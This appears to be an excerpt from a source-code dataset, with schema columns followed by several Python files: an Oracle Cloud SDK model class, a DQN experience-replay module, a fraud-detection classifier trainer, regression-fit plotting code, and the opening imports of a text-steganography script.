hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f740e7537bf56cb8d2a2220e6613977f052c84d4
| 2,187
|
py
|
Python
|
src/oci/logging/models/group_association_details.py
|
Manny27nyc/oci-python-sdk
|
de60b04e07a99826254f7255e992f41772902df7
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 249
|
2017-09-11T22:06:05.000Z
|
2022-03-04T17:09:29.000Z
|
src/oci/logging/models/group_association_details.py
|
Manny27nyc/oci-python-sdk
|
de60b04e07a99826254f7255e992f41772902df7
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 228
|
2017-09-11T23:07:26.000Z
|
2022-03-23T10:58:50.000Z
|
src/oci/logging/models/group_association_details.py
|
Manny27nyc/oci-python-sdk
|
de60b04e07a99826254f7255e992f41772902df7
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 224
|
2017-09-27T07:32:43.000Z
|
2022-03-25T16:55:42.000Z
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class GroupAssociationDetails(object):
"""
Groups using the configuration.
"""
def __init__(self, **kwargs):
"""
Initializes a new GroupAssociationDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param group_list:
The value to assign to the group_list property of this GroupAssociationDetails.
:type group_list: list[str]
"""
self.swagger_types = {
'group_list': 'list[str]'
}
self.attribute_map = {
'group_list': 'groupList'
}
self._group_list = None
@property
def group_list(self):
"""
Gets the group_list of this GroupAssociationDetails.
list of group/dynamic group ids associated with this configuration.
:return: The group_list of this GroupAssociationDetails.
:rtype: list[str]
"""
return self._group_list
@group_list.setter
def group_list(self, group_list):
"""
Sets the group_list of this GroupAssociationDetails.
list of group/dynamic group ids associated with this configuration.
:param group_list: The group_list of this GroupAssociationDetails.
:type: list[str]
"""
self._group_list = group_list
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 30.802817
| 245
| 0.66941
|
ab87a580af5bf2efc666c85d0f768dd0ece197f4
| 11,179
|
py
|
Python
|
examples/DeepQNetwork/expreplay.py
|
yogurfrul/tensorpack
|
af5864439e22bb63a55eb2349164087e89a2ae6e
|
[
"Apache-2.0"
] | null | null | null |
examples/DeepQNetwork/expreplay.py
|
yogurfrul/tensorpack
|
af5864439e22bb63a55eb2349164087e89a2ae6e
|
[
"Apache-2.0"
] | null | null | null |
examples/DeepQNetwork/expreplay.py
|
yogurfrul/tensorpack
|
af5864439e22bb63a55eb2349164087e89a2ae6e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# File: expreplay.py
# Author: Yuxin Wu
import numpy as np
import copy
from collections import deque, namedtuple
import threading
from six.moves import queue, range
from tensorpack.dataflow import DataFlow
from tensorpack.utils import logger
from tensorpack.utils.utils import get_tqdm, get_rng
from tensorpack.utils.stats import StatCounter
from tensorpack.utils.concurrency import LoopThread, ShareSessionThread
from tensorpack.callbacks.base import Callback
__all__ = ['ExpReplay']
Experience = namedtuple('Experience',
['state', 'action', 'reward', 'isOver'])
class ReplayMemory(object):
def __init__(self, max_size, state_shape, history_len):
self.max_size = int(max_size)
self.state_shape = state_shape
assert len(state_shape) == 3, state_shape
# self._state_transpose = list(range(1, len(state_shape) + 1)) + [0]
self._channel = state_shape[2] if len(state_shape) == 3 else 1
self._shape3d = (state_shape[0], state_shape[1], self._channel * (history_len + 1))
self.history_len = int(history_len)
self.state = np.zeros((self.max_size,) + state_shape, dtype='uint8')
self.action = np.zeros((self.max_size,), dtype='int32')
self.reward = np.zeros((self.max_size,), dtype='float32')
self.isOver = np.zeros((self.max_size,), dtype='bool')
self._curr_size = 0
self._curr_pos = 0
self._hist = deque(maxlen=history_len - 1)
def append(self, exp):
"""
Args:
exp (Experience):
"""
if self._curr_size < self.max_size:
self._assign(self._curr_pos, exp)
self._curr_pos = (self._curr_pos + 1) % self.max_size
self._curr_size += 1
else:
self._assign(self._curr_pos, exp)
self._curr_pos = (self._curr_pos + 1) % self.max_size
if exp.isOver:
self._hist.clear()
else:
self._hist.append(exp)
def recent_state(self):
""" return a list of ``hist_len-1`` elements, each of shape ``self.state_shape`` """
lst = list(self._hist)
states = [np.zeros(self.state_shape, dtype='uint8')] * (self._hist.maxlen - len(lst))
states.extend([k.state for k in lst])
return states
def sample(self, idx):
""" return a tuple of (s,r,a,o),
where s is of shape [H, W, (hist_len+1) * channel]"""
idx = (self._curr_pos + idx) % self._curr_size
k = self.history_len + 1
if idx + k <= self._curr_size:
state = self.state[idx: idx + k]
reward = self.reward[idx: idx + k]
action = self.action[idx: idx + k]
isOver = self.isOver[idx: idx + k]
else:
end = idx + k - self._curr_size
state = self._slice(self.state, idx, end)
reward = self._slice(self.reward, idx, end)
action = self._slice(self.action, idx, end)
isOver = self._slice(self.isOver, idx, end)
ret = self._pad_sample(state, reward, action, isOver)
return ret
# the next_state is a different episode if current_state.isOver==True
def _pad_sample(self, state, reward, action, isOver):
# state: Hist+1,H,W,C
for k in range(self.history_len - 2, -1, -1):
if isOver[k]:
state = copy.deepcopy(state)
state[:k + 1].fill(0)
break
# move the first dim to the last
state = state.transpose(1, 2, 0, 3).reshape(self._shape3d)
return (state, reward[-2], action[-2], isOver[-2])
def _slice(self, arr, start, end):
s1 = arr[start:]
s2 = arr[:end]
return np.concatenate((s1, s2), axis=0)
def __len__(self):
return self._curr_size
def _assign(self, pos, exp):
self.state[pos] = exp.state
self.reward[pos] = exp.reward
self.action[pos] = exp.action
self.isOver[pos] = exp.isOver
class ExpReplay(DataFlow, Callback):
"""
Implement experience replay in the paper
`Human-level control through deep reinforcement learning
<http://www.nature.com/nature/journal/v518/n7540/full/nature14236.html>`_.
This implementation provides the interface as a :class:`DataFlow`.
This DataFlow is __not__ fork-safe (thus doesn't support multiprocess prefetching).
This implementation assumes that state is
batch-able, and the network takes batched inputs.
"""
def __init__(self,
predictor_io_names,
player,
state_shape,
batch_size,
memory_size, init_memory_size,
init_exploration,
update_frequency, history_len):
"""
Args:
predictor_io_names (tuple of list of str): input/output names to
predict Q value from state.
player (RLEnvironment): the player.
state_shape (tuple): h, w, c
history_len (int): length of history frames to concat. Zero-filled
initial frames.
update_frequency (int): number of new transitions to add to memory
after sampling a batch of transitions for training.
"""
assert len(state_shape) == 3, state_shape
init_memory_size = int(init_memory_size)
for k, v in locals().items():
if k != 'self':
setattr(self, k, v)
self.exploration = init_exploration
self.num_actions = player.action_space.n
logger.info("Number of Legal actions: {}".format(self.num_actions))
self.rng = get_rng(self)
self._init_memory_flag = threading.Event() # tell if memory has been initialized
# a queue to receive notifications to populate memory
self._populate_job_queue = queue.Queue(maxsize=5)
self.mem = ReplayMemory(memory_size, state_shape, history_len)
self._current_ob = self.player.reset()
self._player_scores = StatCounter()
self._current_game_score = StatCounter()
def get_simulator_thread(self):
# spawn a separate thread to run policy
def populate_job_func():
self._populate_job_queue.get()
for _ in range(self.update_frequency):
self._populate_exp()
th = ShareSessionThread(LoopThread(populate_job_func, pausable=False))
th.name = "SimulatorThread"
return th
def _init_memory(self):
logger.info("Populating replay memory with epsilon={} ...".format(self.exploration))
with get_tqdm(total=self.init_memory_size) as pbar:
while len(self.mem) < self.init_memory_size:
self._populate_exp()
pbar.update()
self._init_memory_flag.set()
# quickly fill the memory for debug
def _fake_init_memory(self):
from copy import deepcopy
with get_tqdm(total=self.init_memory_size) as pbar:
while len(self.mem) < 5:
self._populate_exp()
pbar.update()
while len(self.mem) < self.init_memory_size:
self.mem.append(deepcopy(self.mem._hist[0]))
pbar.update()
self._init_memory_flag.set()
def _populate_exp(self):
""" populate a transition by epsilon-greedy"""
old_s = self._current_ob
if self.rng.rand() <= self.exploration or (len(self.mem) <= self.history_len):
act = self.rng.choice(range(self.num_actions))
else:
# build a history state
history = self.mem.recent_state()
history.append(old_s)
history = np.concatenate(history, axis=-1) # H,W,HistxC
history = np.expand_dims(history, axis=0)
# assume batched network
q_values = self.predictor(history)[0][0] # this is the bottleneck
act = np.argmax(q_values)
self._current_ob, reward, isOver, info = self.player.step(act)
self._current_game_score.feed(reward)
if isOver:
if info['ale.lives'] == 0: # only record score when a whole game is over (not when an episode is over)
self._player_scores.feed(self._current_game_score.sum)
self._current_game_score.reset()
self.player.reset()
self.mem.append(Experience(old_s, act, reward, isOver))
def _debug_sample(self, sample):
import cv2
def view_state(comb_state):
state = comb_state[:, :, :-1]
next_state = comb_state[:, :, 1:]
r = np.concatenate([state[:, :, k] for k in range(self.history_len)], axis=1)
r2 = np.concatenate([next_state[:, :, k] for k in range(self.history_len)], axis=1)
r = np.concatenate([r, r2], axis=0)
cv2.imshow("state", r)
cv2.waitKey()
print("Act: ", sample[2], " reward:", sample[1], " isOver: ", sample[3])
if sample[1] or sample[3]:
view_state(sample[0])
def _process_batch(self, batch_exp):
state = np.asarray([e[0] for e in batch_exp], dtype='uint8')
reward = np.asarray([e[1] for e in batch_exp], dtype='float32')
action = np.asarray([e[2] for e in batch_exp], dtype='int8')
isOver = np.asarray([e[3] for e in batch_exp], dtype='bool')
return [state, action, reward, isOver]
# DataFlow method:
def get_data(self):
# wait for memory to be initialized
self._init_memory_flag.wait()
while True:
idx = self.rng.randint(
self._populate_job_queue.maxsize * self.update_frequency,
len(self.mem) - self.history_len - 1,
size=self.batch_size)
batch_exp = [self.mem.sample(i) for i in idx]
yield self._process_batch(batch_exp)
self._populate_job_queue.put(1)
# Callback methods:
def _setup_graph(self):
self.predictor = self.trainer.get_predictor(*self.predictor_io_names)
def _before_train(self):
self._init_memory()
self._simulator_th = self.get_simulator_thread()
self._simulator_th.start()
def _trigger(self):
v = self._player_scores
try:
mean, max = v.average, v.max
self.trainer.monitors.put_scalar('expreplay/mean_score', mean)
self.trainer.monitors.put_scalar('expreplay/max_score', max)
except Exception:
logger.exception("Cannot log training scores.")
v.reset()
if __name__ == '__main__':
from .atari import AtariPlayer
import sys
def predictor(x):
np.array([1, 1, 1, 1])
player = AtariPlayer(sys.argv[1], viz=0, frame_skip=10, height_range=(36, 204))
E = ExpReplay(predictor,
player=player,
num_actions=player.get_action_space().num_actions(),
populate_size=1001,
history_len=4)
E._init_memory()
for k in E.get_data():
import IPython as IP
IP.embed(config=IP.terminal.ipapp.load_default_config())
pass
| 37.766892
| 115
| 0.600501
|
cc1d95b06d3d67a5a337323a08a79e4f85cda60d
| 4,030
|
py
|
Python
|
trainer.py
|
marcostx/fraud_detection
|
c83da57f9b406844152b8a4fce43c68bcbda247a
|
[
"MIT"
] | null | null | null |
trainer.py
|
marcostx/fraud_detection
|
c83da57f9b406844152b8a4fce43c68bcbda247a
|
[
"MIT"
] | null | null | null |
trainer.py
|
marcostx/fraud_detection
|
c83da57f9b406844152b8a4fce43c68bcbda247a
|
[
"MIT"
] | null | null | null |
#
# Author : Marcos Teixeira
# SkyNet is watching you
#
# common imports
import numpy as np
import pandas as pd
import os
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score,precision_score,recall_score,f1_score
import matplotlib.pyplot as plt
import lightgbm as lgb
def linear_regression_experiment(xtrain, xtest, ytrain, ytest):
# baseline approach : Linear Regression using all variables
from sklearn.linear_model import LogisticRegression
# building the model
model = LogisticRegression()
model.fit(xtrain, ytrain)
preds = model.predict(xtest)
accuracy = accuracy_score(preds,ytest)
recall = recall_score(preds,ytest)
precision = precision_score(preds,ytest)
f1 = f1_score(preds,ytest)
print("accuracy : {}".format(accuracy))
print("recall : {}".format(recall))
print("precision : {}".format(precision))
print("f1 score : {}".format(f1))
# accuracy : 0.9994666666666666
# recall : 1.0
# precision : 0.68
# f1 score : 0.8095238095238095
def lightGBM_experiment(xtrain, xtest, ytrain, ytest, columns, plot_importance=False):
# parameters for LightGBMClassifier
params = {
'objective' :'multiclass',
'learning_rate' : 0.02,
'num_leaves' : 31,
'is_unbalance': 'true',
"max_depth": -1,
"num_class": 2,
'feature_fraction': 0.5,
'bagging_fraction': 0.5,
'boosting_type' : 'gbdt',
'verbosity': 1
}
lgtrain = lgb.Dataset(xtrain,ytrain)
clf = lgb.train(params, lgtrain, 300,feature_name=list(columns))
preds = clf.predict(xtest)
preds = np.argmax(preds, axis=1)
accuracy = accuracy_score(preds,ytest)
recall = recall_score(preds,ytest)
precision = precision_score(preds,ytest)
f1 = f1_score(preds,ytest)
print("accuracy : {}".format(accuracy))
print("recall : {}".format(recall))
print("precision : {}".format(precision))
print("f1 score : {}".format(f1))
# accuracy : 0.9996666666666667
# recall : 0.9545454545454546
# precision : 0.84
# f1 score : 0.8936170212765958
if plot_importance:
ax = lgb.plot_importance(clf)
ax.plot()
plt.show()
def NN_experiment(xtrain, xtest, ytrain, ytest, plot_importance=True):
# baseline approach : Linear Regression using all variables
from sklearn.neural_network import MLPClassifier
# building the model
model = MLPClassifier(hidden_layer_sizes=(200, ), activation='relu', solver='adam', alpha=0.0001,
batch_size='auto', learning_rate='constant', learning_rate_init=0.001, power_t=0.5, max_iter=200,
shuffle=True, random_state=None, tol=0.0001, verbose=False, warm_start=False, momentum=0.9,
nesterovs_momentum=True, early_stopping=False, validation_fraction=0.1, beta_1=0.9, beta_2=0.999,
epsilon=1e-08, n_iter_no_change=10)
model.fit(xtrain, ytrain)
preds = model.predict(xtest)
accuracy = accuracy_score(preds,ytest)
recall = recall_score(preds,ytest)
precision = precision_score(preds,ytest)
f1 = f1_score(preds,ytest)
print("accuracy : {}".format(accuracy))
print("recall : {}".format(recall))
print("precision : {}".format(precision))
print("f1 score : {}".format(f1))
# accuracy : 0.9996333333333334
# recall : 0.9333333333333333
# precision : 0.84
# f1 score : 0.8842105263157894
# paths
DATASITH_PATH='/Users/marcostexeira/Downloads/DESAFIO_CREDITO/'
DATASITH_FILE='desafio_fraude.csv'
def load_fraud_data(data_path,file):
csv_path = os.path.join(data_path, file)
return pd.read_csv(csv_path)
# loading data
dataset = load_fraud_data(DATASITH_PATH,DATASITH_FILE)
np_dataset = dataset.values
# data split
xtrain, xtest, ytrain, ytest = train_test_split(np_dataset[:, :-1],np_dataset[:, -1],test_size=0.2, random_state=42)
ytrain = ytrain.astype(int)
ytest = ytest.astype(int)
lightGBM_experiment(xtrain, xtest, ytrain, ytest, dataset.columns[:-1].values,True)
| 29.851852
| 116
| 0.692308
|
4c1b536c20e38abe2404b0b2e20ef8b399562318
| 13,611
|
py
|
Python
|
fit_plot.py
|
AdamPI314/sensitivity_analysis
|
719ef83643e39580626e69df3bfeb0f60ec882b2
|
[
"MIT"
] | 1
|
2018-11-20T09:18:04.000Z
|
2018-11-20T09:18:04.000Z
|
fit_plot.py
|
AdamPI314/sensitivity_analysis
|
719ef83643e39580626e69df3bfeb0f60ec882b2
|
[
"MIT"
] | null | null | null |
fit_plot.py
|
AdamPI314/sensitivity_analysis
|
719ef83643e39580626e69df3bfeb0f60ec882b2
|
[
"MIT"
] | null | null | null |
"""
fit regression plot
"""
import os
import numpy as np
# from mpl_toolkits.mplot3d import axes3d, Axes3D #<-- Note the capitalization! for plot 3D
import mpl_toolkits.mplot3d.axes3d # register 3d projection
import matplotlib
matplotlib.use('Agg')
from matplotlib import pylab as plt
from matplotlib.ticker import FormatStrFormatter
from color_marker import get_colors_markers_linestyles
import my_utility as mu
import parse_regression_coef as prc
import fit_least_square_regression as flsr
class plot_1D_c:
"""
plot 1D
save to file
"""
xmin = -1
xmax = 1
@staticmethod
def func_leg(x, *coef):
# exclude the 0th order coef, which is a constant
coef_t = np.insert(coef, 0, 0, axis=0)
return np.polynomial.legendre.legval(x, coef_t)
def __init__(self, data_dir, data_sample, target_time, mycoef_1D, zero_order, index, n_2_o_idx=None,
file_name="target_vs_K_1D.jpg"):
label = str(index)
if n_2_o_idx is not None:
label = str(n_2_o_idx[int(label)])
file_name1 = file_name.split(".")[0] + "_" + label + \
"." + file_name.split(".")[-1]
colors, markers, _ = get_colors_markers_linestyles()
fig, ax = plt.subplots(1, 1, sharex=True, sharey=True)
x_1 = data_sample[:, index]
y_1 = target_time
ax.scatter(x_1, y_1, lw=2, color='#FF7F00',
marker=markers[0], label="original")
ax.ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))
ax.ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))
x_2 = np.linspace(self.xmin, self.xmax, 50)
y_2 = self.func_leg(x_2, *(mycoef_1D[index, :]))
ax.plot(
x_2, y_2, color='r', marker=markers[1], label="1st order fit w/ zero order")
y_3 = y_2 + zero_order
ax.plot(
x_2, y_3, color='blue', marker=markers[2], label="1st order + zero order")
leg = ax.legend(loc=0, fancybox=True, prop={'size': 10.0})
leg.get_frame().set_alpha(0.7)
ax.grid()
ax.set_xlabel("$k_{" + label + "}$")
ax.set_ylabel("target")
ax.set_xlim([self.xmin, self.xmax])
fig.savefig(os.path.join(data_dir, "output", file_name1), dpi=500)
plt.close('all')
class plot_2D_c:
"""
plot 2D
save to file
"""
# The definition below is only for 2D legendre value evaluation
def my_legendre_polynomial_2D_val(self, data_x_y, *coef2D_in):
# input parameter- pointer got to be pointer to 1D array
# reshape to a 2D array
# coef2D = np.reshape(coef2D_in, (self.Nth_order, self.Nth_order))
coef2D = np.array(coef2D_in).reshape(
(self.Nth_order_2nd, self.Nth_order_2nd))
# exclude 0th and 1st order coef
coef2D = np.insert(np.insert(coef2D, 0, 0, axis=0), 0, 0, axis=1)
# value
return np.polynomial.legendre.legval2d(data_x_y[0], data_x_y[1], coef2D)
def __init__(self, data_dir, data_sample, target_time, my_coef2D, idx_pair_idx, index, n_2_o_idx=None,
file_name="target_vs_K_2D.jpg"):
"""
idx_pair_idx maps index pair (1, 3) to a flatten 1d index
"""
idx_2d = idx_pair_idx[tuple([index[0], index[1]])]
self.Nth_order_2nd = int(np.sqrt(len(my_coef2D[idx_2d, :])))
x_1 = np.linspace(-1, 1)
y_1 = np.linspace(-1, 1)
x_g, y_g = np.meshgrid(x_1, y_1)
fig, a_x = plt.subplots()
plot1 = a_x.imshow(self.my_legendre_polynomial_2D_val([x_g, y_g], *(my_coef2D[idx_2d, :])),
extent=[-1, 1, 1, -1], origin="upper")
c_b = fig.colorbar(plot1, ax=a_x)
c_b.formatter.set_scientific(True)
c_b.formatter.set_powerlimits((-2, 2))
c_b.update_ticks()
label0 = str(index[0])
label1 = str(index[1])
if n_2_o_idx is not None:
label0 = str(n_2_o_idx[int(label0)])
label1 = str(n_2_o_idx[int(label1)])
a_x.set_xlabel("$k_{" + label0 + "}$")
a_x.set_ylabel("$k_{" + label1 + "}$")
a_x.ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))
a_x.ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))
file_name1 = file_name.split(".")[0] + \
"_" + label0 + "_" + label1 + \
"_contour." + file_name.split(".")[-1]
fig.savefig(os.path.join(data_dir, "output", file_name1), dpi=500)
fig2 = plt.figure()
a_x_2 = fig2.add_subplot(111, projection='3d')
plt.hold(True)
data_1_2 = data_sample[:, index]
a_x_2.scatter(data_1_2[:, 0], data_1_2[:, 1], target_time,
c='#d3ffce', marker='o', s=1.0, alpha=0.8)
a_x_2.plot_surface(x_g, y_g, self.my_legendre_polynomial_2D_val([x_g, y_g], *(my_coef2D[idx_2d, :])),
rstride=1, cstride=1,
cmap=plt.cm.get_cmap('jet'), linewidth=0, antialiased=False, alpha=0.8)
a_x_2.ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))
a_x_2.ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))
a_x_2.ticklabel_format(axis='z', style='sci', scilimits=(-2, 2))
a_x_2.set_xlabel("$k_{" + label0 + "}$")
a_x_2.set_ylabel("$k_{" + label1 + "}$")
a_x_2.set_zlabel("target")
a_x_2.set_title("$2^{nd}$ order fit function")
a_x_2.view_init(37.5, -30)
# ax2.view_init(20,70)
# ax2.view_init(100,-30)
fig2.subplots_adjust(left=0.01, right=0.90, top=0.95)
file_name2 = file_name.split(".")[0] + "_" + label0 + "_" + label1 + "." + \
file_name.split(".")[-1]
fig2.savefig(os.path.join(data_dir, "output", file_name2), dpi=500)
plt.close('all')
class plot_1D_2D_c:
"""
plot 1D and 2D together
save to file
"""
xmin = -1
xmax = 1
# 1D
def func_leg_1D(self, data_x_y, *zero_first_in):
# exclude the 0th order coef, which is a constant
# zero_t= zero_first_in[0]
coef0 = zero_first_in[1:1 + self.Nth_order_1st];
coef1 = zero_first_in[1 + self.Nth_order_1st:]
coef_t0 = np.insert(coef0, 0, 0, axis=0)
coef_t1 = np.insert(coef1, 0, 0, axis=0)
return np.polynomial.legendre.legval(data_x_y[0], coef_t0) + np.polynomial.legendre.legval(data_x_y[1], coef_t1)
# return np.polynomial.legendre.legval(data_x_y[0], coef_t0)+np.polynomial.legendre.legval(data_x_y[1], coef_t1)+zero_t
# The definition below is only for 2D legendre value evaluation
def my_legendre_polynomial_2D_val(self, data_x_y, *coef2D_in):
# input parameter- pointer got to be pointer to 1D array
# reshape to a 2D array
# coef2D = np.reshape(coef2D_in, (self.Nth_order_2nd, self.Nth_order_2nd))
coef2D = np.array(coef2D_in).reshape(
(self.Nth_order_2nd, self.Nth_order_2nd))
# exclude 0th and 1st order coef
coef2D = np.insert(np.insert(coef2D, 0, 0, axis=0), 0, 0, axis=1)
# value
return np.polynomial.legendre.legval2d(data_x_y[0], data_x_y[1], coef2D)
# The definition below is only for 1D and 2D legendre value evaluation
def my_legendre_polynomial_1D_2D_val(self, data_x_y, *zero_first_second_in):
# input parameter- pointer got to be pointer to 1D array
zero_t = zero_first_second_in[0]
coef0 = zero_first_second_in[1:1 + self.Nth_order_1st]
coef1 = zero_first_second_in[1 +
self.Nth_order_1st:self.Nth_order_1st + 1 + self.Nth_order_1st]
coef_t0 = np.insert(coef0, 0, 0, axis=0)
coef_t1 = np.insert(coef1, 0, 0, axis=0)
coef2D_in = zero_first_second_in[self.Nth_order_1st +
1 + self.Nth_order_1st:]
# reshape to a 2D array
coef2D = np.array(coef2D_in).reshape(
(self.Nth_order_2nd, self.Nth_order_2nd))
# exclude 0th and 1st order coef
coef2D = np.insert(np.insert(coef2D, 0, 0, axis=0), 0, 0, axis=1)
# value
return np.polynomial.legendre.legval(data_x_y[0], coef_t0) + np.polynomial.legendre.legval(data_x_y[1],
coef_t1) + zero_t + \
np.polynomial.legendre.legval2d(data_x_y[0], data_x_y[1], coef2D)
def __init__(self, data_dir, data_sample, target_time, zero_order, my_coef1D, my_coef2D,
idx_pair_idx, index, n_2_o_idx=None,
file_name="target_vs_K_1D_2D.jpg"):
idx_2d = idx_pair_idx[tuple([index[0], index[1]])]
self.Nth_order_2nd = int(np.sqrt(len(my_coef2D[idx_2d, :])))
my_coef1D_1 = my_coef1D[index[0], :]
my_coef1D_2 = my_coef1D[index[1], :]
self.Nth_order_1st = len(my_coef1D_1)
zero_first = [zero_order] + list(my_coef1D_1) + list(my_coef1D_2)
zero_first_second = [zero_order] + \
list(my_coef1D_1) + list(my_coef1D_2) + list(my_coef2D[idx_2d, :])
x_1 = np.linspace(self.xmin, self.xmax)
y_1 = np.linspace(self.xmin, self.xmax)
x_g, y_g = np.meshgrid(x_1, y_1)
fig, a_x = plt.subplots()
# plot1= ax.imshow(self.my_legendre_polynomial_2D_val([xg, yg], *my_coef2D), extent=[-1,1,1,-1], origin="upper")
plot1 = a_x.imshow(self.func_leg_1D(
[x_g, y_g], *zero_first), extent=[-1, 1, 1, -1], origin="upper")
# plot1= ax.imshow(self.my_legendre_polynomial_1D_2D_val([xg, yg], *zero_first_second), extent=[-1,1,1,-1], origin="upper")
cb = fig.colorbar(plot1, ax=a_x)
cb.formatter.set_scientific(True)
cb.formatter.set_powerlimits((-2, 2))
cb.update_ticks()
label0 = str(index[0])
label1 = str(index[1])
if n_2_o_idx is not None:
label0 = str(n_2_o_idx[int(label0)])
label1 = str(n_2_o_idx[int(label1)])
a_x.set_xlabel("$k_{" + label0 + "}$")
a_x.set_ylabel("$k_{" + label1 + "}$")
a_x.ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))
a_x.ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))
file_name1 = file_name.split(".")[0] + "_" + label0 + "_" + label1 + "_contour." + \
file_name.split(".")[-1]
fig.savefig(os.path.join(data_dir, "output", file_name1), dpi=600)
fig2 = plt.figure()
a_x_2 = fig2.add_subplot(111, projection='3d')
a_x_2.scatter(data_sample[:, 0], data_sample[:, 1], target_time,
c='#d3ffce', marker='o', s=1.0, alpha=0.8)
a_x_2.plot_surface(x_g, y_g, self.my_legendre_polynomial_2D_val([x_g, y_g], *(my_coef2D[idx_2d, :])),
rstride=1, cstride=1,
cmap=plt.cm.get_cmap('jet'), linewidth=0, antialiased=False, alpha=0.8)
a_x_2.plot_surface(x_g, y_g, self.func_leg_1D([x_g, y_g], *zero_first),
rstride=1, cstride=1,
cmap=plt.cm.get_cmap('jet'), linewidth=0, alpha=0.8)
a_x_2.plot_surface(x_g, y_g, self.my_legendre_polynomial_1D_2D_val([x_g, y_g], *zero_first_second),
rstride=1,
cstride=1,
cmap=plt.cm.get_cmap('jet'), linewidth=0, alpha=0.8)
a_x_2.ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))
a_x_2.ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))
a_x_2.ticklabel_format(axis='z', style='sci', scilimits=(-2, 2))
a_x_2.set_xlabel("$k_{" + label0 + "}$")
a_x_2.set_ylabel("$k_{" + label1 + "}$")
a_x_2.set_zlabel("target")
a_x_2.set_title("$0^{th}$ + $1^{st}$ + $2^{nd}$ order fit function")
# ax2.view_init(37.5,-30)
a_x_2.view_init(10.5, -15)
# ax2.view_init(20,70)
# ax2.view_init(100,-30)
fig2.subplots_adjust(left=0.01, right=0.90, top=0.95)
file_name2 = file_name.split(".")[0] + "_" + label0 + "_" + label1 + "." + \
file_name.split(".")[-1]
fig2.savefig(os.path.join(data_dir, "output", file_name2), dpi=600)
plt.close('all')
def plot_fit_functions(data_dir, s_a_s=None, n_2_o_idx=None):
"""
plot selected fit functions
"""
u_norm = mu.read_uncertainty(os.path.join(data_dir, "output", "uncertainties_const.csv"),
os.path.join(data_dir, "output", "k_global.csv"))
target_sample = mu.read_target(os.path.join(
data_dir, "output", "ign_global.csv"))
_, zero_order_coef, first_order_coef, second_order_coef = prc.parse_regression_coef_c.get_var_zero_first_second_coef(
data_dir, s_a_s=s_a_s)
for idx in range(int(s_a_s['N_variable'])):
plot_1D_c(data_dir, u_norm, target_sample,
first_order_coef, zero_order_coef, idx,
n_2_o_idx=n_2_o_idx)
idx_pair_idx = flsr.fit_1D_2D_all_c.get_idx_pair_idx(s_a_s['N_variable'])
for i in range(int(s_a_s['N_variable'])):
for j in range(i + 1, int(s_a_s['N_variable'])):
plot_2D_c(data_dir, u_norm, target_sample,
second_order_coef, idx_pair_idx, [i, j],
n_2_o_idx=n_2_o_idx)
plot_1D_2D_c(data_dir, u_norm, target_sample,
zero_order_coef, first_order_coef, second_order_coef,
idx_pair_idx, index=[i, j],
n_2_o_idx=n_2_o_idx)
| 41.751534
| 139
| 0.590772
|
634eaba4f5313c1ce33ea16052f9db218c47de0a
| 13,634
|
py
|
Python
|
NeuralSteganography-master1/saac.py
|
slatdude/TextSteganography
|
c17e7ec76ea9bb6fe355c64d740942df616799bd
|
[
"MIT"
] | 5
|
2021-03-01T12:42:26.000Z
|
2022-02-23T11:49:39.000Z
|
NeuralSteganography-master1/saac.py
|
slatdude/TextSteganography
|
c17e7ec76ea9bb6fe355c64d740942df616799bd
|
[
"MIT"
] | null | null | null |
NeuralSteganography-master1/saac.py
|
slatdude/TextSteganography
|
c17e7ec76ea9bb6fe355c64d740942df616799bd
|
[
"MIT"
] | 2
|
2021-03-01T12:22:32.000Z
|
2021-05-22T08:21:00.000Z
|
import torch
import torch.nn.functional as F
import numpy as np
from utils import limit_past, kl, entropy, bits2int, int2bits, is_sent_finish, num_same_from_beg
